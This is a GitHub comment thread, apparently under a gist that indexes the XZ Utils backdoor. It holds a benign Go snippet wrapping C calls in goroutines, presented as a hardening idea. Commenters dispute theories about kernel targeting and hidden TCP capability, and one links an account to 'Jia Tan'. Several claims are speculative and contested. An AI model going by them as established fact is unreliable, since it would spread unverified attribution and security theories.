christoofar commented Apr 13, 2024

I've been thinking a lot about this as a CGo/gccgo dev: "What can a HLL programmer do against the likes of Jia Tan? They're attacking from the foundation software."

I'm not settled on this one but wrapping calls to C libs in goroutines probably would raise the difficultly level, as the rapid context switches and unpredictability introduced on where the Go runtime will move the jump calls happens.

After 129,000 lines of asm, here is printf("Hello World") in Go down at the bottom:
image

Now, let's see what happens when we do this:

func main() {
	hello := "Hello world!"
	go func() {
		print(hello)
	}()
	time.Sleep(1*time.Second)
}

Now we're asking the Go runtime to activate concurrency and main itself gets split into two compact parts with an anonymous function that disappears into the goroutine ecosphere (to get this to fit I'm stripping symbols):
image
image

Notice how nice and compact the goroutine is! Not many things you can do here but try to intercept the ret and call instructions, but you will need to also make sure the runtime stack cleanup happens or things will start to go crashycrashy.

So now let's make a C lib call but push it down into a goroutine wrapper, yet make it synchronous. And for fun, the data to the function will be passed via a channel, which brings in the communication/sync areas of the runtime with its maze of runtime functions. And since we're here, let's make it a full Go wrapper, with two channels and a goroutine bridge, and a done signaler.

package main

// #include <stdio.h>
// #include <stdlib.h>
// void printFromC(const char* str) {
//     printf("Received C string: %s\n", str);
// }
import "C"
import "unsafe"

func main() {
	myPrint("Hello from Go!")
}

func myPrint(hellostring string) {
	// Protect the C library call from Jia Tan and the NSA
	sendchan := make(chan string)
	recvchan := make(chan string)
	done := make(chan bool)
	
	go func(sender chan string, receiver chan string){ // This chan is send-only
		go func(receive <-chan string) { // This one is recv-only
			callCPrint(receive)
			done <- true
		}(receiver)
		go func() {
			strToSend := <- sender
			receiver <- strToSend
			close(sender)
			return
		}()
	}(sendchan, recvchan)

	sendchan <- hellostring
	<-done
	return
}

func callCPrint(str <-chan string) {
	cStr := C.CString(<-str)
	defer C.free(unsafe.Pointer(cStr)) // Deallocate memory when done
	C.printFromC(cStr)
}

The main() in asm representation gets shorter
image

But now there is some real fun going on in myPrint() as it's acting as a traffic cop moving the string along its way into the chaos of pthread, with its context switches and semaphores. myPrint is split by the compiler into 6 asm functions (one each for the launch point and anonymous function of the three goroutines) to allow for their dynamic reallocation to the runtime.

image
That goes on for pages.

callCPrint then has a thunk going on, which can't get back its data to myPrint without going back through the runtime maze.
image

I'm still not sold on this approach but I'm definitely willing to change my own behavior to make these creeps go away if the difficulty is raised high enough. And throwing CGo calls through a goroutine bridge still makes readable code to me.

@tdkuehnel
Copy link

Beside the technical things involved around this incident, which required profound knowledge and ability to develop and implement such an attack, the weak point and what was easy to establish was the social factor of the attack. It took only two persons working together to nudge the project maintainer out of the way. THAT is the real catastrophy.

We need to use the internet to represent our real social connections, not to throw the whole world into one community driven by some huge content aggregators. The real power of the internet is still hidden in its decentralized inherent structure, which we are using and taking benefit of only in small amounts today.

Yes, client-server brought the whole internet thing up to live, but now we are adult enough to decide for our own with whom to share and connect directly and how to decide who has access to which part of my own data. My comments are my data, every content i create is my data, it has to be distributed by the network of the poeple i know and trust, by their devices. Not by content aggregators. When i watch a yt video or other content, i want to see the comments of my friends and social contacts first, access the comments from their data stores directly. Better let me decide and configure which comments to see at all, not let it be dictated by some content aggregators which are deadstuck in their own development. The whole internet has to be shaped around our social contacts and networks, not be dictated by some content aggrgators. /rant off.

@cwegener
Copy link

cwegener commented Apr 14, 2024 via email

@avbentem
Copy link

@cwegener I'm guessing @tdkuehnel may be referring to what happened in 2022 according to a list of events curated by @boehs.

@flybyray
Copy link

flybyray commented Apr 14, 2024

@flybyray Conspiracy theories and insults from people like you are not helpful.

Perhaps you are in a position to take your sort of interference as an insult.

A huge amount of people all over the world who are highly competent in this area have been working on dissecting this exploit for 2 weeks, anyone who claims to have found something new on the technical side here in this discussion only demonstrates being clueless.

Are you implying that I am trying to claim something without a proof? And you try it to do only with a mere personal assertion? Pipes!

Please stop it.

I hope you do that and come back next time with meaningful additions and statements.
I also hope that you understand what an honest discussion is, that you have to fight back when others try to play unfair by ignoring essential context or trying to distort the meaning of statements.

To get back on track:

  • I joint this discussion just by pointing out that the ultimate target for a supply chain attack will be the kernel. I was just missing something here.
  • that there were surprising changes in the linux-next repo shortly before the backdoor became known. 20/03/2024
  • discussions on the kernel mailing regarding this change to remove it, but it was already pushed into linux-next
    • now there is a newer comment https://lwn.net/ml/linux-kernel/20240404170103.1bc382b3@kaneli/ i am happy that my concern is addressed there. but i would be more happy if they would handle all compression tools equally. there should be a strict interface to comply with. i am not sure why only xz should be allowed to run in different form - it just shows that its internal working is to complex.

Exactly what this recent conclusion section states:
"...
It’s evident that this backdoor is highly complex and employs sophisticated methods to evade detection. These include the multi-stage implantation in the XZ repository, as well as the complex code contained within the binary itself.

There is still much more to explore about the backdoor’s internals, which is why we have decided to present this as Part I of the XZ backdoor series. ..."

"the binary itself" could not be ignored as the master plan ( "golden piece") for a targeted supply chain kernel attack.
especially the mentioned discussions put important things( tangible error ) on the table.
there may be other tools that are part of the build process and are assumed to be safe without question. someone has this concern even tries to scan complete package trees https://github.com/hlein/distro-backdoor-scanner

i fear the structure of a suitable defense will look more complex.

hopefully automation and statistics can help to spot risks.
like you need to track maintainers and their commitment to projects. this is just an example:
"""
Many open-source software (OSS) projects are self-organized and do not maintain official lists with information on developer
roles. So, knowing which developers take core and maintainer roles is, despite being relevant, often tacit knowledge. We propose
a method to automatically identify core developers based on role permissions of privileged events triggered in GitHub issues
and pull requests. In an empirical study on 25 GitHub projects, (1) we validate the set of automatically identified core developers
with a sample of project-reported developer lists, and (2) we use our set of identified core developers to assess the accuracy of
state-of-the-art unsupervised developer classification methods. Our results indicate that the set of core developers, which
we extracted from privileged issue events, is sound and the accuracy of state-of-the-art unsupervised classification methods
depends mainly on the data source (commit data vs. issue data) rather than the network-construction method (directed vs.
undirected, etc.). In perspective, our results shall guide research and practice to choose appropriate unsupervised classification
methods, and our method can help create reliable ground-truth data for training supervised classification methods.
"""
ref: https://www.se.cs.uni-saarland.de/publications/docs/BAJ+23.pdf

@calestyo
Copy link

calestyo commented Apr 14, 2024

I'm not the admin here (so obviously @thesamesam decides what this is about and not me), but I had the impression so far that this gist was primarily giving an overview/index/references to the XZ backdoor - not about actual in-depth discussion about the various fields (reverse engineering, OSint, etc. pp) related to it.

That was the nice thing about it, getting only really new/concrete stuff from it.

There do seem to be numerous places which are dedicated to in-depth discussion (and arguing ;-) ) like https://discord.gg/TPz7gBEE (for both, reverse engineering and OSint).

@AdrianBunk
Copy link

I joint this discussion just by pointing out that the ultimate target for a supply chain attack will be the kernel.

That's nonsense.

Nothing you provided indicates that there was actually anything malicious submitted to the kernel, and it would be unbelievably stupid for the attacker to try to add more exploits since this would increase the risk that the openssh backdoor gets detected.

The openssh backdoor would have given the attacker remote administrator access to most Linux servers on the internet.
This is already the ultimate backdoor.

And here is not the right place for people to present whatever thoughts or theories they come up with, please do that in a more appropriate location.

@the-lne
Copy link

the-lne commented Apr 15, 2024 via email

@thesamesam
Copy link
Author

It makes my life a lot easier if the comment section here is kept for editorial changes I need to make, extra sources, etc.

Please keep theorising to other forums. Thanks!

@felipec
Copy link

felipec commented Apr 15, 2024

@thesamesam this is a good resource I think: https://github.com/felipec/xz-min.

@thesamesam
Copy link
Author

Thanks @felipec! I have a few other things to go over in the backlog and can hopefully include them all in a batch later today or tomorrow.

@dnorthup-ums
Copy link

@thesamesam
Sam, et al:
I think there's another "Easter Egg" in there... Looking again, closely, at Lasse's f9cf4c05 commit (the tukaani repo) and his 02e35059 commit, and then re-reading the build tools scripts, it looks like "Jia" intended to be able to use TCP connections from inside of XZ on platforms built with CMAKE. There's got to be some way to invoke that. Perhaps he hadn't finished implementing that part yet..., but I think that somebody with better fuzzing skills than mine should give it a close look. The good news is that Lasse re-enabled the Landlock function for CMAKE builds...., presuming that "Jia" hadn't hidden something in the Landlock code.

Since there's apparently zero interest, here or elsewhere, about following up on "Jia"'s fairly obvious attempt to weaponize the cmake builds, I'm outta here. I'm not hard to find should anybody not manage to make sense of what I said earlier, but I'm not bothering to follow the conversation here anymore.

@thesamesam
Copy link
Author

OK, gone through comments, please let me know if I missed any changes either from here in the last few days or generally on the internet. Thanks!

@roccotanica1234
Copy link

Jia Tan's account, associated to jiat0218@gmail.com on Twitter is: https://twitter.com/JiaT03868010 (I haven't find it mentioned anywhere)

I just noticed that Jia Tan's Twitter registration date (Dec 2020) is earlier than Github registration date. (26 Jan 21)

image

@pillowtrucker
Copy link

did we gett'em yet

@calestyo
Copy link

@thesamesam
Copy link
Author

@calestyo Thanks!

@michaelblyons
Copy link

michaelblyons commented May 1, 2024

You may be interested in @blasty's SSH agent.

Oops. I see it on the list now.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment